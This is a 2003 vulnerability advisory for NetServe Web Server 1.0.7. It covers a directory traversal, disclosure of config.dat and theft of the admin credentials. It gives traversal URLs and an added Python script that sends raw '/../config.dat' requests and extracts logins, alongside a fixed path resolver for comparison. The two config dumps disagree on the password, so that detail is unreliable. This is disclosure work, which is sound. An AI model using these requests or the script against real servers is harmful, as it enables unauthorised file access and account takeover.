________________________
For Contacts:
  nimber
  e-mail: nimber@mail.ru
          nimber@dezigner.ru
  Home Page: www.nimber.plux.ru
  ICQ: 132614
________________________

Advisory Information:
=================
Application     : NetServe Web Server
Date            : 17.11.2003
Vendor Homepage : http://www.starlots.com/netx/index.html
Versions        : 1.0.7 (possibly earlier versions as well)
Platforms       : Windows NT, 95, 98, 2000, and XP
Severity        : High
Local           : yes
Remote          : yes
Tested on WinXP and Win2K.
=================
Advisories: Multiple vulnerabilities in NetServe 1.0.7
=================
Description of the product (from the developer):

"About NetServe Web Server
NetServe is a super compact Web Server and File Sharing application for Windows NT, 95, 98, 2000, and XP. Its HTTP Web Server can serve all types of files including html, gif and jpeg; actually any files placed in your NetServe directory can be served. New key features include Server-Side-Include (SSI) support and CGI/1.1 support, giving you the choice of your preferred scripting language, including but not limited to Perl, ASP and PHP, to create your dynamic content. Other features include a fully integrated File Sharing application supplying a html front end to allow for directory browsing and download. A html form gives users the ability to upload up to 5 files simultaneously to any directory. With security in mind, NetServe features admin tools that allow you full control of how users accessing your server see the resources available; just some of the options include: access served pages only, allow directory browsing, allow file downloading, and even allow file uploading. And of course every action being performed on the NetServe Server is automatically logged, so you can interrogate the logs at a later date for statistics."
=================
Contents:
=================
+ Advisory Information.
+ Part 1: Directory traversal vulnerability.
+ Part 2: Disclosure of the server configuration file.
+ Part 3: Access to the admin password.
=================
Part 1:
======
The server does not filter "/../" sequences in the request path, which lets a client climb above the document root. The vulnerability allows the contents of directories and files outside the web root to be listed and read.

Example:
http://[victim]/../test/
Lists the contents of the folder /test/, one level above the web root.

Example:
http://[victim]/../test/test.txt
Returns the contents of the file test.txt in the folder /test/.

Part 2:
======
By default the server's web root is [NetServe Web Server folder]\wwwroot\. If the admin has not changed this setting, the traversal from Part 1 reaches the installation folder one level up, and with it the server's configuration file.

Example:
http://[victim]/../config.dat

Example of the file:
================
EnableCGI True
EnableRemoteAdmin True
EnableSSI False
EnablePasswords True
IndexFiles index.html index.htm
SSIAbbrevSize True
SSIExtensions shtml
SSIErrorMessage An SSI Error Has Occured
SSITimeFormat
AuthenticationType Basic
Port 80
ServerRoot D:\Program Files\NetServe Web Server\wwwroot\
Logging True
Counter False
Minimized True
ActivateOnStart False
MimeTypes application/mac-binhex40|hqx
MimeTypes application/msword|doc
MimeTypes application/octet-stream|bin dms lha lzh exe class
MimeTypes application/pdf|pdf
MimeTypes application/postscript|ai eps ps
MimeTypes application/smil|smi smil
MimeTypes application/vnd.mif|mif
MimeTypes application/vnd.ms-asf|asf
MimeTypes application/vnd.ms-excel|xls
MimeTypes application/vnd.ms-powerpoint|ppt
MimeTypes application/x-cdlink|vcd
MimeTypes application/x-compress|Z
MimeTypes application/x-cpio|cpio
MimeTypes application/x-csh|csh
MimeTypes application/x-director|dcr dir dxr
MimeTypes application/x-dvi|dvi
MimeTypes application/x-gtar|gtar
MimeTypes application/x-gzip|gz
MimeTypes application/x-javascript|js
MimeTypes application/x-latex|latex
MimeTypes application/x-sh|sh
MimeTypes application/x-shar|shar
MimeTypes application/x-shockwave-flash|swf
MimeTypes application/x-stuffit|sit
MimeTypes application/x-tar|tar
MimeTypes application/x-tcl|tcl
MimeTypes application/x-tex|tex
MimeTypes application/x-texinfo|texinfo texi
MimeTypes application/x-troff|t tr roff
MimeTypes application/x-troff-man|man
MimeTypes application/x-troff-me|me
MimeTypes application/x-troff-ms|ms
MimeTypes application/zip|zip
MimeTypes audio/basic|au snd
MimeTypes audio/midi|mid midi kar
MimeTypes audio/mpeg|mpga mp2 mp3
MimeTypes audio/x-aiff|aif aiff aifc
MimeTypes audio/x-pn-realaudio|ram rm
MimeTypes audio/x-realaudio|ra
MimeTypes audio/x-wav|wav
MimeTypes image/bmp|bmp
MimeTypes image/gif|gif
MimeTypes image/ief|ief
MimeTypes image/jpeg|jpeg jpg jpe
MimeTypes image/png|png
MimeTypes image/tiff|tiff tif
MimeTypes image/x-cmu-raster|ras
MimeTypes image/x-portable-anymap|pnm
MimeTypes image/x-portable-bitmap|pbm
MimeTypes image/x-portable-graymap|pgm
MimeTypes image/x-portable-pixmap|ppm
MimeTypes image/x-rgb|rgb
MimeTypes image/x-xbitmap|xbm
MimeTypes image/x-xpixmap|xpm
MimeTypes image/x-xwindowdump|xwd
MimeTypes image/x-icon|ico
MimeTypes model/iges|igs iges
MimeTypes model/mesh|msh mesh silo
MimeTypes model/vrml|wrl vrml
MimeTypes text/css|css
MimeTypes text/html|html htm
MimeTypes text/plain|asc txt
MimeTypes text/richtext|rtx
MimeTypes text/rtf|rtf
MimeTypes text/sgml|sgml sgm
MimeTypes text/tab-separated-values|tsv
MimeTypes text/xml|xml
MimeTypes video/mpeg|mpeg mpg mpe
MimeTypes video/quicktime|qt mov
MimeTypes video/x-msvideo|avi
Users nimber|password||bmltYmWyfnZpFXmuYW0=
Aliases /admin|D:\Program Files\NetServe Web Server\admin
================

Part 3:
======
Using the vulnerability described above we can obtain the admin password for the server's remote administration, which allows us to change the server configuration completely. The login and password are visible in the configuration file discussed above, config.dat.
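The following Python script is an added example written for this edit; it is neither the author's code nor anything shipped with NetServe. It ties Parts 1 to 3 together: it builds the traversal request by hand, because browsers and most HTTP libraries strip ".." segments before sending (so asking them for http://host/../config.dat quietly requests /config.dat and never exercises the bug); it models how a server that simply appends the request path to ServerRoot ends up outside wwwroot, beside a confined resolver that rejects the same request; and it parses a constructed config.dat in the format shown above to pull out the Users and Aliases entries and verify that the fourth Users field is the Base64 of login:password. The host name "victim", the sample config text and all function names are assumptions; the ServerRoot value is the one from the advisory's config dump.

```python
import base64
import ntpath
import socket
from urllib.parse import unquote

# ServerRoot value taken from the config.dat shown in the advisory.
SERVER_ROOT = "D:\\Program Files\\NetServe Web Server\\wwwroot\\"

# Constructed sample in NetServe's config.dat format ("Key value" lines,
# '|'-separated fields for Users/Aliases); not a real capture.
SAMPLE_CONFIG = r"""EnableCGI True
EnableRemoteAdmin True
EnablePasswords True
AuthenticationType Basic
Port 80
ServerRoot D:\Program Files\NetServe Web Server\wwwroot\
Users nimber|vietnam||bmltYmVyOnZpZXRuYW0=
Aliases /admin|D:\Program Files\NetServe Web Server\admin
"""


def build_request(path: str, host: str = "victim") -> bytes:
    """Raw HTTP/1.0 request. Built by hand: browsers and most HTTP libraries
    apply RFC 3986 dot-segment removal, so asking them for
    http://host/../config.dat sends GET /config.dat and misses the bug."""
    return f"GET {path} HTTP/1.0\r\nHost: {host}\r\n\r\n".encode()


def fetch_raw(host: str, port: int, path: str, timeout: float = 5.0) -> bytes:
    """Send build_request() over a plain socket and return the whole reply."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(build_request(path, host))
        chunks = []
        while True:
            data = sock.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks)


def naive_resolve(server_root: str, url_path: str) -> str:
    """What a server does when it just glues the request path onto ServerRoot:
    '..' segments survive and the OS walks them above the root.
    ntpath.normpath simulates that Windows resolution on any host OS."""
    rel = unquote(url_path).lstrip("/").replace("/", "\\")
    return ntpath.normpath(ntpath.join(server_root, rel))


def confined_resolve(server_root: str, url_path: str):
    """Hardened form: resolve first, then insist the result is the root itself
    or lies beneath it (case-insensitively, as NTFS is). Escapes yield None."""
    root = ntpath.normpath(server_root)
    full = naive_resolve(server_root, url_path)
    if full.casefold() == root.casefold():
        return full
    if full.casefold().startswith(root.casefold() + "\\"):
        return full
    return None


def parse_config(text: str) -> dict:
    """Parse 'Key value' lines; Users, Aliases and MimeTypes repeat, so they
    are collected as lists of '|'-split field lists."""
    cfg: dict = {}
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        key, _, value = line.partition(" ")
        if key in ("Users", "Aliases", "MimeTypes"):
            cfg.setdefault(key, []).append(value.split("|"))
        else:
            cfg[key] = value
    return cfg


def extract_credentials(cfg: dict) -> list:
    """Return (login, password, token_matches) per Users entry. The fourth
    field is checked against Base64('login:password'), i.e. the value a
    client would send in an 'Authorization: Basic' header."""
    found = []
    for fields in cfg.get("Users", []):
        login, password = fields[0], fields[1]
        token = fields[3] if len(fields) > 3 else ""
        expected = base64.b64encode(f"{login}:{password}".encode()).decode()
        found.append((login, password, token == expected))
    return found


if __name__ == "__main__":
    # Offline demonstration. Against a host you are authorised to test, swap
    # the sample for fetch_raw("victim", 80, "/../config.dat").
    print(build_request("/../config.dat").decode())
    print("naive   :", naive_resolve(SERVER_ROOT, "/../config.dat"))
    print("confined:", confined_resolve(SERVER_ROOT, "/../config.dat"))
    print(extract_credentials(parse_config(SAMPLE_CONFIG)))
```

The two resolvers show the whole difference between the vulnerable and the fixed behaviour: both compute the same normalised path, but only the confined one compares it against ServerRoot before opening it. The percent-encoded form %2e%2e is decoded before normalising so that the check cannot be bypassed by encoding the dots.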
Looking at the last lines of the file, the information we need is right there:
====[config.dat]====
Users nimber|vietnam||bmltYmVyOnZpZXRuYW0=
Aliases /admin|D:\Program Files\NetServe Web Server\admin
====[config.dat]====
The Aliases line shows the folder that holds the admin scripts, mapped to /admin. Note that the login and password are not protected at all: the Users line stores them in clear text, and its last field is merely the Base64 encoding of "login:password" (bmltYmVyOnZpZXRuYW0= decodes to nimber:vietnam), i.e. exactly the HTTP Basic credential a client sends to the server.
=================
Gr33tz: ZeT, XSPYD3X, euronymous, JLx, Iww, unix, Demon, mestereeo, Pirog, Corpse, x-a13x, insurrectionist, UnInstall, Kabuto and all my friends.
Re: krok, 3APA3A, buggzy.
p.s> SORRY for my bad english ;)
_EOF_